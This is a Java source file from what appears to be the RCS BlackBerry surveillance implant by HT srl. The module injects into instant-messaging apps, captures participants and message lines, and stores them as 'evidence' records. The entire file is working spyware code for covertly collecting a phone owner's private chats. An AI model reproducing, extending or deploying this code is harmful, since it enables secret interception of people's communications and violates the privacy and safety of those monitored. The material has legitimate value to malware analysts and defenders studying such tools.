
/* *************************************************
 * Copyright (c) 2010 - 2010
 * HT srl,   All rights reserved.
 * Project      : RCS, RCSBlackBerry
 * Package      : blackberry.agent
 * File         : TaskAgent.java
 * Created      : 28-apr-2010
 * *************************************************/
package blackberry.module;

import java.util.Vector;

import net.rim.device.api.ui.UiApplication;
import blackberry.Messages;
import blackberry.Status;
import blackberry.config.ConfModule;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.evidence.Evidence;
import blackberry.evidence.EvidenceType;
import blackberry.evidence.LineMarkup;
import blackberry.injection.InjectorManager;
import blackberry.injection.injectors.group.ChatGroupInjector;
import blackberry.manager.ModuleManager;
import blackberry.utils.DateTime;
import blackberry.utils.Utils;
import blackberry.utils.WChar;

/**
 * Instant Message.
 */
public final class ModuleChat extends BaseModule {




    private static final long APP_TIMER_PERIOD = 5000;

    LineMarkup markup;
    boolean infecting = false;

    //boolean enableInfect;
    boolean isAppForeground;

    private boolean unsupported;

    public static String getStaticType() {
        return Messages.getString("1a.0"); //"chat"; //$NON-NLS-1$
    }

    public static ModuleChat getInstance() {
        return (ModuleChat) ModuleManager.getInstance().get(getStaticType());
    }

    /**
     * Instantiates a new task agents
     * 
     * @param agentStatus
     *            the agent status
     */
    public ModuleChat() {

    }

    protected boolean parse(ConfModule conf) {



        
        setPeriod(NEVER);
        setDelay(SOON);

        markup = new LineMarkup(getStaticType());




        return true;
    }

    public synchronized void actualStart() {




        if (unsupported) {
            return;
        }

        ChatGroupInjector.enableGroup(true);
        UiApplication.getUiApplication().invokeAndWait(new Runnable() {

            public void run() {
                InjectorManager.getInstance().start();
            }
        });

    }

    public void actualLoop() {
        if (unsupported) {
            return;
        }
    }

    public synchronized void actualStop() {




        ChatGroupInjector.enableGroup(false);
        InjectorManager.getInstance().stop();
    }

    private synchronized void serialize(String program, String partecipants,
            String lastLine) {




        if (!markup.isMarkup()) {
            markup.createEmptyMarkup();
        }

        markup.put(program + " : " + partecipants, lastLine);
    }

    private synchronized String unserialize(String program, String partecipants) {




        if (markup.isMarkup()) {
            String lastLine = markup.getLine(program + " : " + partecipants);




            return lastLine;
        }

        return null;
    }

    private void writeEvidence(String program, String partecipants,
            Vector lines, int startFrom) {










        String imname = program; //$NON-NLS-1$
        String topic = ""; //$NON-NLS-1$
        String users = partecipants;

        DateTime datetime = new DateTime();
        final Vector items = new Vector();

        for (int i = startFrom; i < lines.size(); i++) {

            String chatcontent = (String) lines.elementAt(i);

            items.addElement(datetime.getStructTm());
            items.addElement(WChar.getBytes(imname, true));
            items.addElement(WChar.getBytes(topic, true));
            items.addElement(WChar.getBytes(users, true));
            items.addElement(WChar.getBytes(chatcontent, true));
            items.addElement(Utils.intToByteArray(Evidence.E_DELIMITER));
        }

        Evidence evidence = new Evidence(EvidenceType.CHAT);
        evidence.atomicWriteOnce(items);
        
        if(Status.self().wantLight()){
            Debug.ledFlash(Debug.COLOR_WHITE);
            Debug.playSoundOk(1);
        }
    }

    public synchronized void addLines(String program, String partecipants,
            Vector lines) {
        if (lines == null) {



            return;
        }





        if (lines.size() == 0) {



            return;
        }





        String lastLine = unserialize(program, partecipants);

        if (lines.lastElement().equals(lastLine)) {



            return;
        }

        int lastEqual;
        for (lastEqual = lines.size() - 1; lastEqual >= 0; lastEqual--) {
            if (lines.elementAt(lastEqual).equals(lastLine)) {



                break;
            }
        }

        if (lastEqual <= 0) {
            lastEqual = -1;



        }

        try {
            lastLine = (String) lines.lastElement();




            serialize(program, partecipants, lastLine);



            writeEvidence(program, partecipants, lines, lastEqual + 1);




        } catch (Exception ex) {



        }
        return;
    }







}
